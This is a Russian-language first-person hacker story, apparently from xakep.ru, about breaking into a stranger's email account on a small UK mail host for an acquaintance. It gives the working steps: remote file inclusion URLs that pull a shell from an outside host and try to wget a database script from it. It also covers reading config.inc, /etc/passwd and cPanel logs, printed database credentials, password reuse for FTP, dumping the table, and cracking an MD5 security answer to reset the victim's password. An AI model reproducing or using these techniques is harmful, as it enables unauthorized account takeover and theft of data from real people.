Так
повелось, что я никогда не брался за взлом мыл. Но тут поступило
заманчивое предложение от одного знакомого, которому позарез нужен был доступ к
одному мылу. Само мыло располагалось на небольшом почтовике *.co.uk. Знакомый пробовал брутить мыло, но результата это не принесло
и он обратился к мне. Сперва я простмотрел сам почтовик. Кроме окошка ввода логина/пароля
все сплошной html. Попробовал форму ввода пароля на Sql-инъекцию, но ковычки
фильтровались. Server: Apache/1.3.34 (Unix) PHP/5.0.5 mod_auth_passthrough/1.8
mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635
mod_ssl/2.8.25 OpenSSL/0.9.7a Окрытые порты с сервисами тоже не радовали. Решил
проверить, не хостится ли тут еще кто-то. Оказалось по данному
ip числится еще несколько десятков сайтов. Прошелся по ним, единственный phpBB оказался патченным,
поэтому ни один из эксплойтов не сработал. И тут я наткнулся на продукт ArticleBeach www.articlebeach.com. Первый же запрос: http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=ls%20-lpa выдал мне список файлов сервера. Зря програмисты ArticleBeach
ели свой хлеб с маслом. полазив по сайту я нашел еще одни баг, добродушно оставленный
разработчиками ArticleBeach, в директории /includes/ любой юзер может просмотреть файл
config.inc следующего содержания: Пример файла взят с сайта девелоперов ArticleBeach http://www.articlebeach.com/includes/config.inc <? global $_cn; global $dbserver; global $db; global $dbuser; global $dbpass; //mysql database server,login,password & Database name $dbserver ="localhost"; $database_connect="article_art"; $dbuser ="article_jer"; $dbpass ="aaaaa"; $connect = mysql_connect($dbserver, $dbuser, $dbpass) or die("Couldn't connect to MySQL"); mysql_select_db($database_connect, $connect); ?> Как вы уже поняли это реквизиты доступа к базе данных сервера. К сожаленю в моем случае пароль на базу данных не подошел
к фтп, чего нескажешь о других сайтах, где стоит продукт от ArticleBeach. Пришлось ковырять сервер через внешнюю инклуду. Открыв /etc/passwd я не смог обнаружить имя нужного мне
почтовика, логины юзеров и доменные имена сайтов несовпадали. Зато была возможность просматривать web-директории пользователей:
/home/*/public_html/ Уже хотел было начать тупо перебирать всех по списку, но
решил проверить файл accounting.log, в котором хранятся логины и доменные имена на cpanel. И
точно я получил список доменных имен. Выбрал нужный и стал изучать веб-директорию. Быстро нашел
в исходниках реквизиты доступа к БД MySQL: 'database' => '***_themail', // Name of your MySQL database 'username' => '***_postman', // The username and password
that 'password' => 'jkretj3h45j' Пароль опять не подошел к фтп. Осталось
только прицепится к БД. Надо было искать доступную на запись
директорию или файл. И опять спасибо разработчикам ArticleBeach которые позаботились
в своем продукте о директории /backup/ с правами drwxrwxrwx. http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=wget
-O backup/sql.php http://durito.narod.ru/sql.php и фиг, то же самое с GET, links, fetch, lynx. Позже я узнал,
что запуск wget и GET запрещался PHP Secure, links, fetch
и lynx отсутсвовали. Продолжил внутренний осмотр сайтов хостера. Навыуживал еще
несколько паролей к БД, но к фтп они опять не подошли, все
пароли представляли собой многосимвольную абракадабру. И вдруг тайваньский сайт, интуиция подсказала проверить
его и вот оно - пароль доступа к БД - anahol !!! Конект
к фтп, пасс проходит и скрипт для работы с БД от rst.void.ru
залит. Конект
к базе, нахожу нужную таблицу и дамплю ее. А вот и заветное
мыло, пароль правда зашифрован MD5, но это дело поправимое, правда долгое и муторное. Но для
начала я решил проверить хеш на http://md5.rednoize.com/,
но пасс не был найден, и я уже приготовился было к долгому перебору,
но тут заметил, что и ответ на секретный вопрос тоже закодирован
в MD5. Пробиваю на md5.rednoize.com секретный вопрос и вот он:
Cheung !!! Захожу не почтовик и отвечаю на секретный вопрос. Мне предлагают
ввести новый пароль и его подтвердить. Шах и мат! И мой приятель получает доступ к заветному мылу, незабыв
мне выкатить пива. А я удаляюсь его жадно поглощать. опубликована
на www.xakep.ru Твой
bug Durito. _________________ EAT THE RICH! |